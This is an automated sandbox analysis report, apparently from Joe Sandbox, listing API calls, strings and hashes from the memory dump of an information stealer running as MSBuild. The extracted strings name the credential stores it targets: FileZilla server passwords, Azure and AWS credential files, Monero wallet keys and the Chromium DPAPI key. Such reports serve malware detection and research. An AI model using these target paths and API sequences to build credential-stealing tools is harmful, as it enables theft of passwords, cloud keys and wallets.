                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BBB7
                                                • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 0041BBC2
                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 0041BBDE
                                                • TerminateProcess.KERNEL32(00000000), ref: 0041BBE5
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                • String ID:
                                                • API String ID: 2579439406-0
                                                • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                • Instruction ID: 2759986af63cf1bc905e0f8428f5e2b998159022a12c47e0d709fe691c65c3be
                                                • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                • Instruction Fuzzy Hash: E921A3BC9002059FDB10DF69FD89A963BE4FB0A314F50403AE90A87264DBB45981EF4D
                                                APIs
                                                • strtok_s.MSVCRT ref: 0041031B
                                                • memset.MSVCRT ref: 004106DD
                                                  • Part of subcall function 004188E0: malloc.MSVCRT ref: 004188E8
                                                  • Part of subcall function 004188E0: strncpy.MSVCRT ref: 00418903
                                                • strtok_s.MSVCRT ref: 00410679
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: strtok_s$mallocmemsetstrncpy
                                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$NA$NA$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                                • API String ID: 2676359353-514892060
                                                • Opcode ID: 5617bd6bc83757f25327082bfbfb60fa8d0a6348b7b524702c500f70768eef60
                                                • Instruction ID: d15eb70b6d553ab1cc94bc99ca27928082ec116ada4a7d19c18b432e65637ade
                                                • Opcode Fuzzy Hash: 5617bd6bc83757f25327082bfbfb60fa8d0a6348b7b524702c500f70768eef60
                                                • Instruction Fuzzy Hash: 86D16D75A41208ABCB04FBF1DD86EEE7379FF14314F50441EF102A6091DE78AA96CB69
                                                APIs
                                                • memset.MSVCRT ref: 00410C1C
                                                • lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                                • lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                                • lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                                • lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                                • lstrcatA.KERNEL32(?,00000000), ref: 00410C88
                                                • lstrcatA.KERNEL32(?,00420D84), ref: 00410C9A
                                                • lstrlenA.KERNEL32(?), ref: 00410CA7
                                                • memset.MSVCRT ref: 00410CCD
                                                • memset.MSVCRT ref: 00410CE1
                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00410D5A
                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00410D66
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcat$memset$CreateObjectProcessSingleWaitlstrlen
                                                • String ID: .exe
                                                • API String ID: 2214552867-4119554291
                                                • Opcode ID: 6364e5e739fe9739766a1ce8d8c7e5a183e8e2bdcb2e6e6671a0d6d634042010
                                                • Instruction ID: 8c4414bd7b792449c86a3c64e171a12ac7102eaeec46e1acf96b3d3d4dd6cf75
                                                • Opcode Fuzzy Hash: 6364e5e739fe9739766a1ce8d8c7e5a183e8e2bdcb2e6e6671a0d6d634042010
                                                • Instruction Fuzzy Hash: A78194B55111186BCB14FBA1CD52FEE7338AF44308F40419EB30A66082DE786AD9CF6E
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: memset
                                                • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$zaA
                                                • API String ID: 2221118986-156832076
                                                • Opcode ID: 63500b277e5d8c6ba40ed9413d1edfa83572fad66260e383529a6b6b95d2c298
                                                • Instruction ID: 18812f4626155d1e2a42465cb68794f5c6847905bec5d07e7ac1139e0e5490f3
                                                • Opcode Fuzzy Hash: 63500b277e5d8c6ba40ed9413d1edfa83572fad66260e383529a6b6b95d2c298
                                                • Instruction Fuzzy Hash: 3141D6B9A4031467C710F7B0EC47FDD3738AB64704F404459B645660C2EEB897D98B9A
                                                APIs
                                                • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 004170DE
                                                • OpenProcess.KERNEL32(001FFFFF,00000000,0041730D,004205BD), ref: 0041711C
                                                • memset.MSVCRT ref: 0041716A
                                                • ??_V@YAXPAX@Z.MSVCRT(?), ref: 004172BE
                                                Strings
                                                • sA, xrefs: 00417111
                                                • sA, xrefs: 004172AE, 00417179, 0041717C
                                                • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041718C
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: OpenProcessmemset
                                                • String ID: sA$sA$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                                • API String ID: 1606381396-2614523144
                                                • Opcode ID: a73ac6e1bb2c91b578430d02177e5a2f8beb51943881740cc90b8311f986bdaf
                                                • Instruction ID: ffe5c4151d56689e238fca5affca6521033e0b5082b25a646ea50ffb364ad3ac
                                                • Opcode Fuzzy Hash: a73ac6e1bb2c91b578430d02177e5a2f8beb51943881740cc90b8311f986bdaf
                                                • Instruction Fuzzy Hash: 71515FB0D04218ABDB14EB91DD85BEEB774AF04304F1040AEE61576281EB786AC9CF5D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: !=A$%s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                                • API String ID: 0-817767981
                                                • Opcode ID: c3ad0e5f37a6afd264e19c98f003c489031be70fef7a74d9d5741692706db697
                                                • Instruction ID: 6b32dcbabd2ae606338a05af88a65253e6d0136fcb4401239c8972690a9ca057
                                                • Opcode Fuzzy Hash: c3ad0e5f37a6afd264e19c98f003c489031be70fef7a74d9d5741692706db697
                                                • Instruction Fuzzy Hash: 45A182B5A40218ABDB20DFA4DC85FEA7379BF45301F04458DB50D96181EB789B84CF66
                                                APIs
                                                  • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                  • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                  • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                  • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                • memcpy.MSVCRT(?,00000000,00000000), ref: 00405EC6
                                                • memcpy.MSVCRT(?), ref: 00405EFE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ??2@$memcpy$CrackInternet
                                                • String ID: "$"$------$------$------
                                                • API String ID: 4271525049-2180234286
                                                • Opcode ID: 4205a6c64491eede6f2c0190817c01b6d1188d899bee5cc8d5380a99dbe7c93c
                                                • Instruction ID: 7b5b204680124ce1d4beb717fdfef1c68a0c63715f2d18b0248442adb904f056
                                                • Opcode Fuzzy Hash: 4205a6c64491eede6f2c0190817c01b6d1188d899bee5cc8d5380a99dbe7c93c
                                                • Instruction Fuzzy Hash: 20124071821118ABCB15FBA1DC95FEEB378BF14314F50419EB10A62091DF782B9ACF69
                                                APIs
                                                • memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                  • Part of subcall function 00410A60: memset.MSVCRT ref: 00410C1C
                                                  • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                                  • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                                  • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                                  • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                                • memcmp.MSVCRT(?,v10,00000003), ref: 00409EAF
                                                • memset.MSVCRT ref: 00409EE8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcat$memcmpmemset
                                                • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                                • API String ID: 1976689032-1096346117
                                                • Opcode ID: cf3bd8b6a91d7380b4fcfdc4a2eaf8d3038d72e2fe7c69aa23c32b41aba9b41f
                                                • Instruction ID: cfc602575c7eb8b90e75612a825b183f0a0020e5ceb1952e76b28d7f8d83ce04
                                                • Opcode Fuzzy Hash: cf3bd8b6a91d7380b4fcfdc4a2eaf8d3038d72e2fe7c69aa23c32b41aba9b41f
                                                • Instruction Fuzzy Hash: C9615F30A00248EBCB24EFA5DD96FED7775AF44304F408029F90A6F1D1DB786A56CB5A
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: memset
                                                • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                • API String ID: 2221118986-218353709
                                                • Opcode ID: a32f2aae1de9b97ae466325f1f020e6fdbbafcfcec33de046a9004802322f3a2
                                                • Instruction ID: 674d48b949cffd92695f0a4f51b6d393b2dd06dcaa63b8f6d50fb5eb71b8da29
                                                • Opcode Fuzzy Hash: a32f2aae1de9b97ae466325f1f020e6fdbbafcfcec33de046a9004802322f3a2
                                                • Instruction Fuzzy Hash: AA5164B195011897CB15FB61DD91BED733CAF54304F4041ADB60A62091EE385BDACBAA
                                                APIs
                                                  • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000,00420DFB), ref: 004062E1
                                                  • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                  • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,?,00000000,00000000,00400100,00000000), ref: 00406385
                                                  • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                • strtok.MSVCRT(00000000,?), ref: 0041539E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: HttpInternetOpenRequest$ConnectSendstrtok
                                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                • API String ID: 1208788097-1526165396
                                                • Opcode ID: 4a2ea036609cd15b672270c35ab07a18dfd7f62b3a06473966441f12aab465d2
                                                • Instruction ID: 2e955e57ea7f1c083e6e45f715f374ff83ee784ca3e0e9be4ff8c8b21657e330
                                                • Opcode Fuzzy Hash: 4a2ea036609cd15b672270c35ab07a18dfd7f62b3a06473966441f12aab465d2
                                                • Instruction Fuzzy Hash: 1A514130911108EBCB14FF61CD92AED7779AF50358F50402EF80A6B591DF386B96CB6A
                                                APIs
                                                • __lock.LIBCMT ref: 0041B39A
                                                  • Part of subcall function 0041AFAC: __mtinitlocknum.LIBCMT ref: 0041AFC2
                                                  • Part of subcall function 0041AFAC: __amsg_exit.LIBCMT ref: 0041AFCE
                                                  • Part of subcall function 0041AFAC: EnterCriticalSection.KERNEL32(?,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041AFD6
                                                • DecodePointer.KERNEL32(0042A138,00000020,0041B4DD,?,00000001,00000000,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E), ref: 0041B3D6
                                                • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B3E7
                                                  • Part of subcall function 0041BE35: EncodePointer.KERNEL32(00000000,0041C063,004495B8,00000314,00000000,?,?,?,?,?,0041B707,004495B8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041BE37
                                                • DecodePointer.KERNEL32(-00000004,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B40D
                                                • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B420
                                                • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B42A
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                                • String ID:
                                                • API String ID: 2005412495-0
                                                • Opcode ID: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                                                • Instruction ID: fa90de3286715eaa6817e9c79d9293911763414a7997c4368e9d4f64dee3ff46
                                                • Opcode Fuzzy Hash: 430bce5bb079d1d45eb37588782b3a2619b50b5e0611126e08e4fa3877c2895d
                                                • Instruction Fuzzy Hash: A5314874900309DFDF109FA9C9452DEBAF1FF48314F10802BE454A6262CBB94891DFAE
                                                APIs
                                                • __getptd.LIBCMT ref: 0041C9EA
                                                  • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                                  • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                                • __amsg_exit.LIBCMT ref: 0041CA0A
                                                • __lock.LIBCMT ref: 0041CA1A
                                                • InterlockedDecrement.KERNEL32(?), ref: 0041CA37
                                                • free.MSVCRT ref: 0041CA4A
                                                • InterlockedIncrement.KERNEL32(0042B558), ref: 0041CA62
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                                • String ID:
                                                • API String ID: 634100517-0
                                                • Opcode ID: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                                • Instruction ID: 84b4572ca590114782b091576b9a89d8360325c6110713fe167f1eb626e4287d
                                                • Opcode Fuzzy Hash: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                                • Instruction Fuzzy Hash: 5801C431A817299BC722EB669C857DE77A0BF04794F01811BE81467390C72C69D2CBDD
                                                APIs
                                                • strlen.MSVCRT ref: 00416F1F
                                                • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041719A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 00416F4D
                                                  • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416BE1
                                                  • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416C05
                                                • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 00416F92
                                                • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041719A), ref: 004170B3
                                                  • Part of subcall function 00416DE0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00416DF8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: strlen$MemoryProcessQueryReadVirtual
                                                • String ID: @
                                                • API String ID: 2950663791-2766056989
                                                • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                • Instruction ID: da6ee04ed372484ea639f8c5ae6d2cf8ded6d6947598eb42fecba3fc0a9bdd2e
                                                • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                                • Instruction Fuzzy Hash: 27511CB5E041099BDB04CF98D981AEFBBB5FF88304F108559F919A7340D738EA51CBA5
                                                APIs
                                                • __getptd.LIBCMT ref: 0041C74E
                                                  • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                                  • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                                • __getptd.LIBCMT ref: 0041C765
                                                • __amsg_exit.LIBCMT ref: 0041C773
                                                • __lock.LIBCMT ref: 0041C783
                                                • __updatetlocinfoEx_nolock.LIBCMT ref: 0041C797
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                • String ID:
                                                • API String ID: 938513278-0
                                                • Opcode ID: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
                                                • Instruction ID: 4c6ecd523783b942696bdc62fd612c852c6eee159b5b032e672b771ca3e86784
                                                • Opcode Fuzzy Hash: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
                                                • Instruction Fuzzy Hash: B0F09632A813119BD7207BB95C467DE33A09F00728F24414FF414A62D2CBAC59D28E9E
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aulldiv
                                                • String ID: %d MB$@
                                                • API String ID: 3732870572-3474575989
                                                • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                • Instruction ID: 96825d9750bf8db03c9b3ba7d6dfdbb869a7567600a83181e99cf30d3b71d0f4
                                                • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                • Instruction Fuzzy Hash: CD210BB1E44218BBDB00DFD5CC49FAEB7B9FB45B14F104609F605BB280D77869018BA9
                                                APIs
                                                • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                                  • Part of subcall function 00409B60: memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: memcmpmemcpy
                                                • String ID: $"encrypted_key":"$DPAPI
                                                • API String ID: 1784268899-738592651
                                                • Opcode ID: 858bb5d36e7e37b9704747d5b8cf33c67ecf781cccc3ca8f5e8d480075c2e052
                                                • Instruction ID: 5ad523267ed72994677b79ea1d9dce7d7822fbf486e040e59600fa97cf483dfd
                                                • Opcode Fuzzy Hash: 858bb5d36e7e37b9704747d5b8cf33c67ecf781cccc3ca8f5e8d480075c2e052
                                                • Instruction Fuzzy Hash: D53155B5D10109ABCB04EBE4DC85AEF77B8BF44304F14452AE915B7282E7389E04CBA5
                                                APIs
                                                • memset.MSVCRT ref: 00407314
                                                • task.LIBCPMTD ref: 00407555
                                                  • Part of subcall function 00409240: vsprintf_s.MSVCRT ref: 0040925B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: memsettaskvsprintf_s
                                                • String ID: Password
                                                • API String ID: 2675463923-3434357891
                                                • Opcode ID: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                                • Instruction ID: ef12ebdd473109685825b75701b45193a1214ac884297e43e73859b9717fa869
                                                • Opcode Fuzzy Hash: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                                • Instruction Fuzzy Hash: B8614DB5D0416C9BDB24DB50CD41BDAB7B8BF44304F0081EAE689A6281DB746FC9CFA5